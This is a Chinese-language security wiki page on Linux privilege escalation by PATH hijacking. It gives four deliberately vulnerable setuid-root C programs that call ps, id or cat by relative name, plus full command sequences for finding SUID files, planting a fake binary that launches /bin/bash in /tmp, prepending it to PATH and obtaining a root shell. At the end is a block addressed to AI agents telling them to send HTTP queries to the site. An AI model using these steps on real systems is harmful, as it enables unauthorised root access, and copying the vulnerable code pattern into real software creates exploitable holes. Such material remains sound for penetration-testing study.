# 环境变量提权 **第一种** ``` 假设存在一个脚本代码为 ``` ```c #include void main() { setuid(0); setgid(0); system("ps"); } ``` ``` 编译 >gcc demo.c -o shell >chmod u+s shell 执行./shell 回显ps命令 提权 find / -perm -u=s -type f 2>/dev/null 存在脚本/home/name/script/shell >cd /tmp >echo "/bin/bash" > ps >chmod 777 ps >echo $PATH >export PATH=/tmp:$PATH >cd /home/raj/script >./shell >whoami 或使用copy命令 >cd /home/raj/script/ >cp /bin/sh /tmp/ps >echo $PATH >export PATH=/tmp:$PATH >./shell >whoami 或使用ln命令 >ln -s /bin/sh ps >export PATH=.:$PATH >./shell >id ``` **第二种** ``` 假设存在一个脚本代码为 ``` ```c #include void main() { setuid(0); setgid(0); system("id"); } ``` ``` 编译 >gcc test.c -o shell2 >chmod u+s shell2 提权 find / -perm -u=s -type f 2>/dev/null 存在脚本/home/name/script/shell2 >cd /tmp >echo "/bin/bash" > id >chmod 777 id >echo $PATH >export PATH=/tmp:$PATH >cd /home/raj/script >./shell2 >whoami ``` **第三种** ``` 假设存在一个脚本代码为 ``` ```c #include void main() { setuid(0); setgid(0); system("cat /etc/passwd"); } ``` ``` 编译后提权 find / -perm -u=s -type f 2>/dev/null 存在脚本/home/name/script/shell3 >cd /tmp >vi cat 内容为/bin/bash >chmod 777 cat >ls -al cat >echo $PATH >export PATH=/tmp:$PATH >cd /home/raj/script >./shell3 >whoami ``` **第四种** ``` 假设存在一个脚本代码为 ``` ```c #include void main() { setuid(0); setgid(0); system("cat /home/raj/msg.txt"); } ``` ``` 编译后提权 find / -perm -u=s -type f 2>/dev/null 存在脚本/home/name/script/shell4 >cd /tmp >vi cat >chmod 777 cat >echo $PATH >export PATH=/tmp:$PATH >cd /home/raj/script >./shell4 >whoami ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.heresecurity.wiki/quan-xian-ti-sheng/linux-ti-quan/huan-jing-bian-liang-ti-quan.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.